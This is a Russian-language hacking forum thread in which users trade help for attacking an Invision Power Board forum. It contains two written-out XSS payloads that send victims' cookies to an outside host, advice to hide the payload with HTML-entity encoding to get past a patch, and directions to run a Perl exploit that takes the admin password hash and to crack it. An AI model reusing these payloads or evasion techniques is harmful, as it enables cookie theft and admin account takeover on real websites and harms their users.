Нужна поиощь есть форум http://forum.низя ссылки.ru Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc. На нем я использовал [E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)` Дыру закрыли То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS Помогите зашифровать его или другой способ!! Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's
Попробуй зашифровать некоторые фрагменты сплойта тут: _http://www.h4cky0u.org/encrypt/index.php в кодировку HTML Entities
Нашол другой XSS Можно ли его вставиить в картинку ?? wj@wj[url=http://www.wj.com`=`][/url].com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);
да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.
